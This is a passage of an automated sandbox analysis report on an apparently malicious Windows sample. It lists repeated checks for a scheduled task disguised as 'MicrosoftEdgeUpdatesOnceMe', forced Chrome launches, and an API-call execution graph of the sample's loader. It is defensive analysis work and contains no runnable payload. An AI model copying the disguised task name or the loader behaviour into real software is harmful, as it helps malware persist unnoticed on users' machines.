                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:66
                                                                                                                      Start time:07:40:21
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:67
                                                                                                                      Start time:07:40:25
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:68
                                                                                                                      Start time:07:40:26
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,3791569026057449520,15559375112028835645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:69
                                                                                                                      Start time:07:40:31
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:70
                                                                                                                      Start time:07:40:31
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:71
                                                                                                                      Start time:07:40:32
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:72
                                                                                                                      Start time:07:40:33
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,6770807407451840845,2731558754491331151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:73
                                                                                                                      Start time:07:40:34
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:74
                                                                                                                      Start time:07:40:38
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=532930
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:75
                                                                                                                      Start time:07:40:39
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1992,i,293139969124192718,13583878474494082115,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:76
                                                                                                                      Start time:07:40:40
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:77
                                                                                                                      Start time:07:40:40
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:78
                                                                                                                      Start time:07:40:40
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:79
                                                                                                                      Start time:07:40:44
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:80
                                                                                                                      Start time:07:40:44
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:81
                                                                                                                      Start time:07:40:45
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:82
                                                                                                                      Start time:07:40:49
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:83
                                                                                                                      Start time:07:40:49
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,4903166560758941508,11037472114900692945,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:84
                                                                                                                      Start time:07:40:50
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:85
                                                                                                                      Start time:07:40:50
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:86
                                                                                                                      Start time:07:40:50
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:87
                                                                                                                      Start time:07:40:55
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:88
                                                                                                                      Start time:07:40:56
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1476 --field-trial-handle=2056,i,15588339443550297223,13273642016281484051,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:89
                                                                                                                      Start time:07:40:57
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:90
                                                                                                                      Start time:07:40:57
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:91
                                                                                                                      Start time:07:40:57
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:11%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:16.3%
                                                                                                                        Total number of Nodes:2000
                                                                                                                        Total number of Limit Nodes:45
                                                                                                                        execution_graph 14866 7ff7a673b19c 14887 7ff7a673b36c 14866->14887 14869 7ff7a673b2e8 14989 7ff7a673b69c IsProcessorFeaturePresent 14869->14989 14870 7ff7a673b1b8 __scrt_acquire_startup_lock 14872 7ff7a673b2f2 14870->14872 14878 7ff7a673b1d6 __scrt_release_startup_lock 14870->14878 14873 7ff7a673b69c 7 API calls 14872->14873 14875 7ff7a673b2fd __FrameHandler3::FrameUnwindToEmptyState 14873->14875 14874 7ff7a673b1fb 14876 7ff7a673b281 14893 7ff7a673b7e8 14876->14893 14878->14874 14878->14876 14978 7ff7a6748984 14878->14978 14879 7ff7a673b286 14896 7ff7a6731000 14879->14896 14884 7ff7a673b2a9 14884->14875 14985 7ff7a673b500 14884->14985 14996 7ff7a673b96c 14887->14996 14890 7ff7a673b39b __scrt_initialize_crt 14891 7ff7a673b1b0 14890->14891 14998 7ff7a673cac8 14890->14998 14891->14869 14891->14870 15025 7ff7a673c210 14893->15025 14895 7ff7a673b7ff GetStartupInfoW 14895->14879 14897 7ff7a673100b 14896->14897 15027 7ff7a6737600 14897->15027 14899 7ff7a673101d 15034 7ff7a6744f14 14899->15034 14901 7ff7a673367b 15041 7ff7a6731af0 14901->15041 14905 7ff7a673ad80 _wfindfirst32i64 8 API calls 14906 7ff7a67337ae 14905->14906 14983 7ff7a673b82c GetModuleHandleW 14906->14983 14907 7ff7a6733699 14936 7ff7a673379a 14907->14936 15057 7ff7a6733b20 14907->15057 14909 7ff7a67336cb 14909->14936 15060 7ff7a6736990 14909->15060 14911 7ff7a67336e7 14912 7ff7a6733733 14911->14912 14913 7ff7a6736990 61 API calls 14911->14913 15075 7ff7a6736f90 14912->15075 14919 7ff7a6733708 __vcrt_freefls 14913->14919 14915 7ff7a6733748 15079 7ff7a67319d0 14915->15079 14918 7ff7a673383d 14921 7ff7a6733868 14918->14921 15208 7ff7a6733280 14918->15208 14919->14912 14924 7ff7a6736f90 58 API calls 14919->14924 14920 7ff7a67319d0 121 API calls 14923 7ff7a673377e 14920->14923 14932 7ff7a67338ab 14921->14932 15090 7ff7a6737a30 14921->15090 14927 7ff7a6733782 14923->14927 14928 7ff7a67337c0 14923->14928 14924->14912 14926 7ff7a6733888 14929 7ff7a673388d 14926->14929 14930 7ff7a673389e SetDllDirectoryW 14926->14930 15172 7ff7a6732770 14927->15172 14928->14918 15185 7ff7a6733cb0 14928->15185 14933 7ff7a6732770 59 API calls 14929->14933 14930->14932 15104 7ff7a6735e40 14932->15104 14933->14936 14936->14905 14939 7ff7a67337e2 14944 7ff7a6732770 59 API calls 14939->14944 14940 7ff7a6733906 14947 7ff7a67339c6 14940->14947 14955 7ff7a6733919 14940->14955 14943 7ff7a6733810 14943->14918 14946 7ff7a6733815 14943->14946 14944->14936 14945 7ff7a67338c8 14945->14940 15222 7ff7a6735640 14945->15222 15204 7ff7a673f2ac 14946->15204 15108 7ff7a6733110 14947->15108 14953 7ff7a67338dd 15242 7ff7a67355d0 14953->15242 14954 7ff7a67338fc 14959 7ff7a6735890 FreeLibrary 14954->14959 14960 7ff7a6733965 14955->14960 15316 7ff7a6731b30 14955->15316 14959->14940 14960->14936 15320 7ff7a67330b0 14960->15320 14961 7ff7a67338e7 14961->14954 14963 7ff7a67338eb 14961->14963 14962 7ff7a67339fb 14964 7ff7a6736990 61 API calls 14962->14964 15310 7ff7a6735c90 14963->15310 14970 7ff7a6733a07 14964->14970 14968 7ff7a67339a1 14969 7ff7a6735890 FreeLibrary 14968->14969 14969->14936 14970->14936 15125 7ff7a6736fd0 14970->15125 14979 7ff7a674899b 14978->14979 14980 7ff7a67489bc 14978->14980 14979->14876 17687 7ff7a67490d8 14980->17687 14984 7ff7a673b83d 14983->14984 14984->14884 14987 7ff7a673b511 14985->14987 14986 7ff7a673b2c0 14986->14874 14987->14986 14988 7ff7a673cac8 __scrt_initialize_crt 7 API calls 14987->14988 14988->14986 14990 7ff7a673b6c2 _wfindfirst32i64 __scrt_get_show_window_mode 14989->14990 14991 7ff7a673b6e1 RtlCaptureContext RtlLookupFunctionEntry 14990->14991 14992 7ff7a673b70a RtlVirtualUnwind 14991->14992 14993 7ff7a673b746 __scrt_get_show_window_mode 14991->14993 14992->14993 14994 7ff7a673b778 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14993->14994 14995 7ff7a673b7ca _wfindfirst32i64 14994->14995 14995->14872 14997 7ff7a673b38e __scrt_dllmain_crt_thread_attach 14996->14997 14997->14890 14997->14891 14999 7ff7a673cada 14998->14999 15000 7ff7a673cad0 14998->15000 14999->14891 15004 7ff7a673ce44 15000->15004 15005 7ff7a673cad5 15004->15005 15006 7ff7a673ce53 15004->15006 15008 7ff7a673ceb0 15005->15008 15012 7ff7a673d080 15006->15012 15009 7ff7a673cedb 15008->15009 15010 7ff7a673cebe DeleteCriticalSection 15009->15010 15011 7ff7a673cedf 15009->15011 15010->15009 15011->14999 15016 7ff7a673cee8 15012->15016 15017 7ff7a673d002 TlsFree 15016->15017 15023 7ff7a673cf2c __vcrt_FlsAlloc 15016->15023 15018 7ff7a673cf5a LoadLibraryExW 15020 7ff7a673cf7b GetLastError 15018->15020 15021 7ff7a673cfd1 15018->15021 15019 7ff7a673cff1 GetProcAddress 15019->15017 15020->15023 15021->15019 15022 7ff7a673cfe8 FreeLibrary 15021->15022 15022->15019 15023->15017 15023->15018 15023->15019 15024 7ff7a673cf9d LoadLibraryExW 15023->15024 15024->15021 15024->15023 15026 7ff7a673c1f0 15025->15026 15026->14895 15026->15026 15029 7ff7a673761f 15027->15029 15028 7ff7a6737670 WideCharToMultiByte 15028->15029 15031 7ff7a6737718 15028->15031 15029->15028 15029->15031 15032 7ff7a67376c6 WideCharToMultiByte 15029->15032 15033 7ff7a6737627 __vcrt_freefls 15029->15033 15357 7ff7a6732620 15031->15357 15032->15029 15032->15031 15033->14899 15035 7ff7a674ec40 15034->15035 15037 7ff7a674ece6 15035->15037 15038 7ff7a674ec93 15035->15038 15036 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15040 7ff7a674ecbc 15036->15040 15754 7ff7a674eb18 15037->15754 15038->15036 15040->14901 15042 7ff7a6731b05 15041->15042 15043 7ff7a6731b20 15042->15043 15762 7ff7a67324d0 15042->15762 15043->14936 15045 7ff7a6733ba0 15043->15045 15046 7ff7a673adb0 15045->15046 15047 7ff7a6733bac GetModuleFileNameW 15046->15047 15048 7ff7a6733bdb 15047->15048 15049 7ff7a6733bf2 15047->15049 15050 7ff7a6732620 57 API calls 15048->15050 15802 7ff7a6737b40 15049->15802 15052 7ff7a6733bee 15050->15052 15055 7ff7a673ad80 _wfindfirst32i64 8 API calls 15052->15055 15054 7ff7a6732770 59 API calls 15054->15052 15056 7ff7a6733c2f 15055->15056 15056->14907 15058 7ff7a6731b30 49 API calls 15057->15058 15059 7ff7a6733b3d 15058->15059 15059->14909 15061 7ff7a673699a 15060->15061 15062 7ff7a6737a30 57 API calls 15061->15062 15063 7ff7a67369bc GetEnvironmentVariableW 15062->15063 15064 7ff7a6736a26 15063->15064 15065 7ff7a67369d4 ExpandEnvironmentStringsW 15063->15065 15066 7ff7a673ad80 _wfindfirst32i64 8 API calls 15064->15066 15067 7ff7a6737b40 59 API calls 15065->15067 15068 7ff7a6736a38 15066->15068 15069 7ff7a67369fc 15067->15069 15068->14911 15069->15064 15070 7ff7a6736a06 15069->15070 15813 7ff7a674910c 15070->15813 15073 7ff7a673ad80 _wfindfirst32i64 8 API calls 15074 7ff7a6736a1e 15073->15074 15074->14911 15076 7ff7a6737a30 57 API calls 15075->15076 15077 7ff7a6736fa7 SetEnvironmentVariableW 15076->15077 15078 7ff7a6736fbf __vcrt_freefls 15077->15078 15078->14915 15080 7ff7a6731b30 49 API calls 15079->15080 15081 7ff7a6731a00 15080->15081 15082 7ff7a6731b30 49 API calls 15081->15082 15088 7ff7a6731a7a 15081->15088 15083 7ff7a6731a22 15082->15083 15084 7ff7a6733b20 49 API calls 15083->15084 15083->15088 15085 7ff7a6731a3b 15084->15085 15820 7ff7a67317b0 15085->15820 15088->14918 15088->14920 15089 7ff7a673f2ac 74 API calls 15089->15088 15091 7ff7a6737ad7 MultiByteToWideChar 15090->15091 15092 7ff7a6737a51 MultiByteToWideChar 15090->15092 15093 7ff7a6737afa 15091->15093 15094 7ff7a6737b1f 15091->15094 15095 7ff7a6737a77 15092->15095 15096 7ff7a6737a9c 15092->15096 15097 7ff7a6732620 55 API calls 15093->15097 15094->14926 15098 7ff7a6732620 55 API calls 15095->15098 15096->15091 15101 7ff7a6737ab2 15096->15101 15099 7ff7a6737b0d 15097->15099 15100 7ff7a6737a8a 15098->15100 15099->14926 15100->14926 15102 7ff7a6732620 55 API calls 15101->15102 15103 7ff7a6737ac5 15102->15103 15103->14926 15105 7ff7a6735e55 15104->15105 15106 7ff7a67338b0 15105->15106 15107 7ff7a67324d0 59 API calls 15105->15107 15106->14940 15212 7ff7a6735ae0 15106->15212 15107->15106 15114 7ff7a6733183 15108->15114 15117 7ff7a67331c4 15108->15117 15109 7ff7a6733203 15111 7ff7a673ad80 _wfindfirst32i64 8 API calls 15109->15111 15110 7ff7a6731ab0 74 API calls 15110->15117 15112 7ff7a6733215 15111->15112 15112->14936 15118 7ff7a6736f20 15112->15118 15114->15117 15893 7ff7a6731440 15114->15893 15927 7ff7a6732990 15114->15927 15982 7ff7a6731780 15114->15982 15117->15109 15117->15110 15119 7ff7a6737a30 57 API calls 15118->15119 15120 7ff7a6736f3f 15119->15120 15121 7ff7a6737a30 57 API calls 15120->15121 15122 7ff7a6736f4f 15121->15122 15123 7ff7a67466b4 38 API calls 15122->15123 15124 7ff7a6736f5d __vcrt_freefls 15123->15124 15124->14962 15126 7ff7a6736fe0 15125->15126 15127 7ff7a6737a30 57 API calls 15126->15127 15128 7ff7a6737011 SetConsoleCtrlHandler GetStartupInfoW 15127->15128 15129 7ff7a6737072 15128->15129 16859 7ff7a6749184 15129->16859 15133 7ff7a6737081 15134 7ff7a6749184 _fread_nolock 37 API calls 15133->15134 15135 7ff7a67370a0 15134->15135 15136 7ff7a6746ef8 _fread_nolock 37 API calls 15135->15136 15137 7ff7a67370a7 15136->15137 15173 7ff7a6732790 15172->15173 15174 7ff7a6743be4 49 API calls 15173->15174 15175 7ff7a67327dd __scrt_get_show_window_mode 15174->15175 15176 7ff7a6737a30 57 API calls 15175->15176 15177 7ff7a673280a 15176->15177 15178 7ff7a6732849 MessageBoxA 15177->15178 15179 7ff7a673280f 15177->15179 15181 7ff7a6732863 15178->15181 15180 7ff7a6737a30 57 API calls 15179->15180 15182 7ff7a6732829 MessageBoxW 15180->15182 15183 7ff7a673ad80 _wfindfirst32i64 8 API calls 15181->15183 15182->15181 15184 7ff7a6732873 15183->15184 